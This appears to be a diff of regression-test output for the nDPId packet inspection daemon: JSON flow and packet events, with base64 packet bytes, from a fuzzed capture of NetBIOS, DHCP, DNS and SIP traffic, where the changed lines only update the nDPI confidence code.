00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1120470685610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470685610,"pkt":"\/\/\/\/\/\/\/\/AODtA269CABFAABOa4YAAIARTsfAqAECyKgB\/wCJAIkAOltWhUUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469540839,"flow_last_seen":1120470684110,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2592,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469540839,"flow_last_seen":1120470684110,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2592,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1120470717078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1120470717078,"pkt":"ADBUADRWAODtAW69CABFAAFIa4cAAIARSsrAqAECwKgBAQBEAEMBNA+RAQEGAAZtDDgAAAAAwKgBAgAAAAAAAAAAAAAAAN\/g7QFuvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADUAAAAAAAAAAAAAAAAAAAAAYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANABjglNjNQEDPQcBAODtAW69DAdkMDAyNDY1UQsAAABkMDAyNDY1LjwITVNGVCA1LjA3CgEPAwYsLi8fISv\/AAAA"} -00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"d002465","fingerprint":"1,15,3,6,44,46,47,31,33,43","class_ident":"MSFT 5.0"}} +00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"d002465","fingerprint":"1,15,3,6,44,46,47,31,33,43","class_ident":"MSFT 5.0"}} 01186{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1120470717080,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1120470717080,"pkt":"AODtAW69ADBUADRWCABFAAJAAAAAAEAR9VnAqAEBwKgBAgBDAEQCLJ6VAgEGAAZtDDgAAAAAwKgBAsCoAQIAAAAAAAAAAADg7QFuvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABv2gAAAAAAAAAA0QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAEBMwQAAA4QDAdkMDAyNDY1AQT\/9\/8AAwTAqAEBBgTAqAEB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAFAAAAA="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1120470721915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120470721915,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADlXM4AAIARWMHAqAEpwKgB\/wCKAYoA0YerEQJM2MCoASkAigC7AAAghU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAABGAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XbkUAAQCA\/AoATEFCMTExAAAAAAAAAAAAAAUBAxAAAA8BVaoA"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":620000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":620000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3} 00583{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":490,"packets-processed":409,"total-skipped-flows":0,"total-l4-payload-len":39786,"total-not-detected-flows":16,"total-guessed-flows":10,"total-detected-flows":134,"total-detection-updates":55,"total-updates":22,"current-active-flows":40,"total-active-flows":189,"total-idle-flows":149,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":950,"global_ts_msec":1120470764674} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1120470764674,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470764674,"pkt":"ADBUADRWQODtAW69CABFAAA+a48AAIARS8zAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlLQhzaXBwc3RhcgNjb20AAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1120470765675,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470765675,"pkt":"AEtUADRWAODtAW69CABFAAA+a5AAAIARS8vAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXC6c3RhcgNjb20AAAEAAQ=="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470767678} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470765675,"pkt":"ADBUADRWAODtAW69CABFAAA+a5EABGQRS8rAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXBwc3RhcgNjb20AAAEAAQ=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1120470768028,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1120470768028,"pkt":"AODtAW69ADBUADRWCABFAACbAABAAGcRtv7AqAEBwKgBAgA1CukAh65F6OyBgAABAAEAAgACA3JlZwhzaXBwc3RhcgNjb20AAAEAAcAMAAEAAQAAAlgABFJi0SfAEAACAAEAAAJYAA8CbnMGaHNwZWVkA25ldADAEAACAAEAAAJYAAYDbnMzwEHAPgABAAEAAAUPAAQ+XcA7wFkAAQABAAAFDwAE1d1SAg=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 